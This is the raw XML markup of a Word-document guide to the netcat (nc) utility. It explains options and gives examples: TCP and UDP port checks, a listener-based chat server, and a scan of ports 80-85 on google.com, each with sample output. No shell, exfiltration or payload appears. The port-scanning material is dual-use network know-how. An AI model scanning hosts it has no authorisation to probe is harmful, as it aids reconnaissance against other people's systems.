          <w:p w14:paraId="108136CE"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t>-O, --output-length LENGTH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482042D2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Maximum bytes to output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0D3BBC28" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C65B6AE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00234914" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00234914">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>-P, --proxy-proto PROTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="251E0F3F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use proxy protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47ADFCF5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00234914">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE2635" w14:textId="5FC8E683" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Test TCP port connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CABFA"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zv google.com 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E5EDF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A9509"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onnection to google.com 80 port [tcp/http] succeeded!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20045635" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C0439" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection succeeded</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: TCP port 80 is open and accepting connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAD7CD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[tcp/http]</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Port 80 is associated with HTTP protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576585D3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-z flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Zero I/O mode, just check if port is open without sending data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCBCBE3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Verbose output shows connection status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6159B44E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>google.com 80</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Successfully connected to Google's web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49670374" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Useful for testing if specific services are running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC614B" w14:textId="57E1B740" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Test UDP port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D4027"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zuv 8.8.8.8 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43030411" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BFC93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onnection to 8.8.8.8 53 port [udp/domain] succeeded!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0997BA19" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB0682" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[udp/domain]</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Port 53 is associated with DNS protocol over UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C57042" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.8.8.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Google's public DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870754F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-u flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: UDP protocol mode instead of default TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D512FAA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-z flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Zero I/O mode for port checking only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E700A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Verbose output showing connection status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3CFCF5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Confirms DNS service is responding on standard port 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C12E3A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Different from TCP - UDP is connectionless so "succeeded" means port appears open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2E948" w14:textId="24950442" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Create a simple chat server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C695C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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On server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6902F870" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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l 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201D102" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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40" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABBF7EC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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On client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822C311" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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server_ip 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A25512" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A64A9D" w14:textId="56529352" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="005F3C78" w:rsidP="005F3C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40" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00251962" w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Server side (nc -l 1234):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54892FEB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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Listening on port 1234...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E001DC5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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onnection received from 192.168.1.100:45678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582C869" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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Hello from client!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18289BEC" w14:textId="77777777" w:rsidR="005F3C78" w:rsidRDefault="005F3C78" w:rsidP="005F3C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40" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154F46AE" w14:textId="6EC2D9AB" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="005F3C78" w:rsidP="005F3C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40" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00251962" w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Client side (nc 192.168.1.10 1234):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D572F38" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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Hello from client!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB3F0D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C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erver response: Hello back!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6EA90C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657E43C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-l flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Listen mode, creates server on specified port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBB873" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 1234</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Custom port for communication channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3FE7C5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection received</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows client IP and source port (45678)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB6228" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bidirectional</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Both sides can send and receive messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE18075" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-time chat</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Messages appear instantly on both sides</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2509DFDF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.100:45678</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Client's IP and randomly assigned source port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE3FEA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interactive communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Creates simple text-based communication channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17469594" w14:textId="19B9CFAF" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Port scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E510A2"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zv google.com 80-85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBBD5E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C8090"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onnection to google.com 80 port [tcp/http] succeeded!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBCDDB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connect to google.com port 81: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07939C2A"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connect to google.com port 82: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DABE7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connect to google.com port 83: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8BDF5"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connect to google.com port 84: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C2FB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connect to google.com port 85: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FD699" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648983A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port range 80-85</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Tests ports 80 through 85 sequentially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04D198" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 80 succeeded</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: HTTP service is running and accepting connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E99D0C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ports 81-85 refused</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: These ports are closed or firewalled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A8D41" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[tcp/http]</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Port 80 is identified as HTTP service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749E3C8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-z flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Zero I/O mode for port scanning only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B46285" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Verbose output showing all attempted connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34739D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3C78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Reveals which services are publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36442C12" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Check multiple ports for open services.</w:t>
      </w:r>
    </w:p>
